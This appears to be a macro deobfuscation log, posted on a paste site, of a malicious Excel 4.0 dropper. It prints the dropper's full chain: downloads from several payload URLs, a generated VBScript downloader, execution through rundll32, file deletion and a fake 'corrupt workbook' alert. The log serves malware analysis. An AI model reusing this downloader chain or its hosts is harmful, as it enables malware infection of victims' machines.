- CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:CU38574 , FullEvaluation , [FALSE]
- CELL:CU38575 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38576 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38577 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38578 , FullEvaluation , IF(R38576C99<40000,,GOTO(R38589C99))
- CELL:CU38579 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
- CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
- CELL:CU38582 , FullEvaluation , [FALSE]
- CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
- CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
- CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:AQ33177 , FullEvaluation , [FALSE] GOTO(R26995C97)
- CELL:CS26995 , FullEvaluation , "=""C:\Users\Public\ezNJJrCR.html"""
- CELL:CS26996 , FullEvaluation , "=""C:\Users\Public\CiOnQpVy.vbs"""
- CELL:CS26997 , FullEvaluation , "=FOPEN(R62431C74,3)"
- CELL:CS26998 , FullEvaluation , "=FWRITELN(R62432C74,""M1UW = """"https://wireborg.com/wp-keys.php"""""")"
- CELL:CS26999 , FullEvaluation , "=FWRITELN(R62432C74,""U4Uo = """"http://zmedia.shwetech.com/wp-keys.php"""""")"
- CELL:CS27000 , FullEvaluation , "=FWRITELN(R62432C74,""pqlyh = """"https://datalibacbi.ml/wp-keys.php"""""")"
- CELL:CS27001 , FullEvaluation , "=FWRITELN(R62432C74,""OeDOJy = """"https://procacardenla.ga/wp-keys.php"""""")"
- CELL:CS27002 , FullEvaluation , "=FWRITELN(R62432C74,""DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)"")"
- CELL:CS27003 , FullEvaluation , "=FWRITELN(R62432C74,""Dim OJxd: Set OJxd = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
- CELL:CS27004 , FullEvaluation , "=FWRITELN(R62432C74,""Function Uj8Ty(data):"")"
- CELL:CS27005 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.setOption(2) = 13056"")"
- CELL:CS27006 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.Open """"GET"""", data, False"")"
- CELL:CS27007 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
- CELL:CS27008 , FullEvaluation , "=FWRITELN(R62432C74,""OJxd.Send"")"
- CELL:CS27009 , FullEvaluation , "=FWRITELN(R62432C74,""Uj8Ty = OJxd.Status"")"
- CELL:CS27010 , FullEvaluation , "=FWRITELN(R62432C74,""End Function"")"
- CELL:CS27011 , FullEvaluation , "=FWRITELN(R62432C74,""For Each o37s4 in DcH"")"
- CELL:CS27012 , FullEvaluation , "=FWRITELN(R62432C74,""If Uj8Ty(o37s4) = 200 Then"")"
- CELL:CS27013 , FullEvaluation , "=FWRITELN(R62432C74,""Dim qjDgRsx: Set qjDgRsx = CreateObject(""""ADODB.Stream"""")"")"
- CELL:CS27014 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Open"")"
- CELL:CS27015 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Type = 1"")"
- CELL:CS27016 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Write OJxd.ResponseBody"")"
- CELL:CS27017 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.SaveToFile """"""&R62430C74&"""""", 2"")"
- CELL:CS27018 , FullEvaluation , "=FWRITELN(R62432C74,""qjDgRsx.Close"")"
- CELL:CS27019 , FullEvaluation , "=FWRITELN(R62432C74,""Exit For"")"
- CELL:CS27020 , FullEvaluation , "=FWRITELN(R62432C74,""End If"")"
- CELL:CS27021 , FullEvaluation , "=FWRITELN(R62432C74,""Next"")"
- CELL:CS27022 , FullEvaluation , "=FCLOSE(R62432C74)"
- CELL:CS27023 , FullEvaluation , "=EXEC(""explorer.exe ""&R62431C74&"""")"
- CELL:CS27024 , FullEvaluation , "=WHILE(ISERROR(FILES(R62430C74)))"
- CELL:CS27025 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
- CELL:CS27026 , FullEvaluation , "=NEXT()"
- CELL:CS27027 , FullEvaluation , "=FILE.DELETE(R62431C74)"
- CELL:CS27028 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
- CELL:CS27029 , FullEvaluation , "=""C:\Users\Public\EgkL.vbs"""
- CELL:CS27030 , FullEvaluation , "=FOPEN(R62464C74,3)"
- CELL:CS27031 , FullEvaluation , "=""rundll32.exe"""
- CELL:CS27032 , FullEvaluation , "=R62430C74&"",DllRegisterServer"""
- CELL:CS27033 , FullEvaluation , "=""C:\Windows\System32"""
- CELL:CS27034 , FullEvaluation , "=FWRITELN(R62465C74,""Set b7H = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
- CELL:CS27035 , FullEvaluation , "=FWRITELN(R62465C74,""b7H.Document.Application.ShellExecute """"""&R62466C74&"""""",""""""&R62467C74&"""""",""""""&R62468C74&"""""",Null,0"")"
- CELL:CS27036 , FullEvaluation , "=FCLOSE(R62465C74)"
- CELL:CS27037 , FullEvaluation , "=EXEC(""explorer.exe ""&R62464C74&"""")"
- CELL:CS27038 , FullEvaluation , "=GOTO(R33146C43)"
- CELL:CS27039 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________82)
- CELL:HH20519 , FullEvaluation , FORMULA("=FORMULA(R[6475]C[-119],R[41910]C[-142])",egaz0Af2DyYfLadkmB$HH$20520:$HH$20563)
- CELL:HH20520 , FullEvaluation , FORMULA("=""C:\Users\Public\ezNJJrCR.html""",R[41910]C[-142])
- CELL:HH20521 , FullEvaluation , FORMULA("=""C:\Users\Public\CiOnQpVy.vbs""",R[41910]C[-142])
- CELL:HH20522 , FullEvaluation , FORMULA("=FOPEN(R62431C74,3)",R[41910]C[-142])
- CELL:HH20523 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""M1UW = """"https://wireborg.com/wp-keys.php"""""")",R[41910]C[-142])
- CELL:HH20524 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""U4Uo = """"http://zmedia.shwetech.com/wp-keys.php"""""")",R[41910]C[-142])
- CELL:HH20525 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""pqlyh = """"https://datalibacbi.ml/wp-keys.php"""""")",R[41910]C[-142])
- CELL:HH20526 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OeDOJy = """"https://procacardenla.ga/wp-keys.php"""""")",R[41910]C[-142])
- CELL:HH20527 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)"")",R[41910]C[-142])
- CELL:HH20528 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Dim OJxd: Set OJxd = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[41910]C[-142])
- CELL:HH20529 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Function Uj8Ty(data):"")",R[41910]C[-142])
- CELL:HH20530 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.setOption(2) = 13056"")",R[41910]C[-142])
- CELL:HH20531 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.Open """"GET"""", data, False"")",R[41910]C[-142])
- CELL:HH20532 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[41910]C[-142])
- CELL:HH20533 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""OJxd.Send"")",R[41910]C[-142])
- CELL:HH20534 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Uj8Ty = OJxd.Status"")",R[41910]C[-142])
- CELL:HH20535 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""End Function"")",R[41910]C[-142])
- CELL:HH20536 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""For Each o37s4 in DcH"")",R[41910]C[-142])
- CELL:HH20537 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""If Uj8Ty(o37s4) = 200 Then"")",R[41910]C[-142])
- CELL:HH20538 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Dim qjDgRsx: Set qjDgRsx = CreateObject(""""ADODB.Stream"""")"")",R[41910]C[-142])
- CELL:HH20539 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Open"")",R[41910]C[-142])
- CELL:HH20540 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Type = 1"")",R[41910]C[-142])
- CELL:HH20541 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Write OJxd.ResponseBody"")",R[41910]C[-142])
- CELL:HH20542 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.SaveToFile """"""&R62430C74&"""""", 2"")",R[41910]C[-142])
- CELL:HH20543 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""qjDgRsx.Close"")",R[41910]C[-142])
- CELL:HH20544 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Exit For"")",R[41910]C[-142])
- CELL:HH20545 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""End If"")",R[41910]C[-142])
- CELL:HH20546 , FullEvaluation , FORMULA("=FWRITELN(R62432C74,""Next"")",R[41910]C[-142])
- CELL:HH20547 , FullEvaluation , FORMULA("=FCLOSE(R62432C74)",R[41910]C[-142])
- CELL:HH20548 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R62431C74&"""")",R[41910]C[-142])
- CELL:HH20549 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R62430C74)))",R[41910]C[-142])
- CELL:HH20550 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[41910]C[-142])
- CELL:HH20551 , FullEvaluation , FORMULA("=NEXT()",R[41910]C[-142])
- CELL:HH20552 , FullEvaluation , FORMULA("=FILE.DELETE(R62431C74)",R[41910]C[-142])
- CELL:HH20553 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[41910]C[-142])
- CELL:HH20554 , FullEvaluation , FORMULA("=""C:\Users\Public\EgkL.vbs""",R[41910]C[-142])
- CELL:HH20555 , FullEvaluation , FORMULA("=FOPEN(R62464C74,3)",R[41910]C[-142])
- CELL:HH20556 , FullEvaluation , FORMULA("=""rundll32.exe""",R[41910]C[-142])
- CELL:HH20557 , FullEvaluation , FORMULA("=R62430C74&"",DllRegisterServer""",R[41910]C[-142])
- CELL:HH20558 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[41910]C[-142])
- CELL:HH20559 , FullEvaluation , FORMULA("=FWRITELN(R62465C74,""Set b7H = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[41910]C[-142])
- CELL:HH20560 , FullEvaluation , FORMULA("=FWRITELN(R62465C74,""b7H.Document.Application.ShellExecute """"""&R62466C74&"""""",""""""&R62467C74&"""""",""""""&R62468C74&"""""",Null,0"")",R[41910]C[-142])
- CELL:HH20561 , FullEvaluation , FORMULA("=FCLOSE(R62465C74)",R[41910]C[-142])
- CELL:HH20562 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R62464C74&"""")",R[41910]C[-142])
- CELL:HH20563 , FullEvaluation , FORMULA("=GOTO(R33146C43)",R[41910]C[-142])
- CELL:HH20564 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________83)
- CELL:BV62430 , FullEvaluation , "C:\Users\Public\ezNJJrCR.html"
- CELL:BV62431 , FullEvaluation , "C:\Users\Public\CiOnQpVy.vbs"
- CELL:BV62432 , PartialEvaluation , FOPEN("C:\Users\Public\CiOnQpVy.vbs",3)
- CELL:BV62433 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","M1UW = ""https://wireborg.com/wp-keys.php""")
- CELL:BV62434 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","U4Uo = ""http://zmedia.shwetech.com/wp-keys.php""")
- CELL:BV62435 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","pqlyh = ""https://datalibacbi.ml/wp-keys.php""")
- CELL:BV62436 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OeDOJy = ""https://procacardenla.ga/wp-keys.php""")
- CELL:BV62437 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","DcH = Array(M1UW,U4Uo,pqlyh,OeDOJy)")
- CELL:BV62438 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Dim OJxd: Set OJxd = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
- CELL:BV62439 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Function Uj8Ty(data):")
- CELL:BV62440 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.setOption(2) = 13056")
- CELL:BV62441 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.Open ""GET"", data, False")
- CELL:BV62442 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
- CELL:BV62443 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","OJxd.Send")
- CELL:BV62444 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Uj8Ty = OJxd.Status")
- CELL:BV62445 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","End Function")
- CELL:BV62446 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","For Each o37s4 in DcH")
- CELL:BV62447 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","If Uj8Ty(o37s4) = 200 Then")
- CELL:BV62448 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Dim qjDgRsx: Set qjDgRsx = CreateObject(""ADODB.Stream"")")
- CELL:BV62449 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Open")
- CELL:BV62450 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Type = 1")
- CELL:BV62451 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Write OJxd.ResponseBody")
- CELL:BV62452 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.SaveToFile ""C:\Users\Public\ezNJJrCR.html"", 2")
- CELL:BV62453 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","qjDgRsx.Close")
- CELL:BV62454 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Exit For")
- CELL:BV62455 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","End If")
- CELL:BV62456 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)","Next")
- CELL:BV62457 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\CiOnQpVy.vbs"",3)")
- CELL:BV62458 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\CiOnQpVy.vbs")
- CELL:BV62459 , PartialEvaluation , WHILE(ISERROR(FILES(R62430C74)))
- CELL:BV62462 , PartialEvaluation , FILE.DELETE("C:\Users\Public\CiOnQpVy.vbs")
- CELL:BV62463 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
- CELL:BV62464 , FullEvaluation , "C:\Users\Public\EgkL.vbs"
- CELL:BV62465 , PartialEvaluation , FOPEN("C:\Users\Public\EgkL.vbs",3)
- CELL:BV62466 , FullEvaluation , "rundll32.exe"
- CELL:BV62467 , FullEvaluation , "C:\Users\Public\ezNJJrCR.html,DllRegisterServer"
- CELL:BV62468 , FullEvaluation , "C:\Windows\System32"
- CELL:BV62469 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\EgkL.vbs"",3)","Set b7H = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
- CELL:BV62470 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\EgkL.vbs"",3)","b7H.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\ezNJJrCR.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
- CELL:BV62471 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\EgkL.vbs"",3)")
- CELL:BV62472 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\EgkL.vbs")
- CELL:BV62473 , FullEvaluation , GOTO(R33146C43)
- CELL:AQ33146 , End , CLOSE(FALSE)
- CELL:AQ33156 , FullEvaluation , [FALSE] GOTO(R33146C43)
- CELL:AQ33146 , End , CLOSE(FALSE)
- [END of Deobfuscation]
- time elapsed: 10.969358205795288
- Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement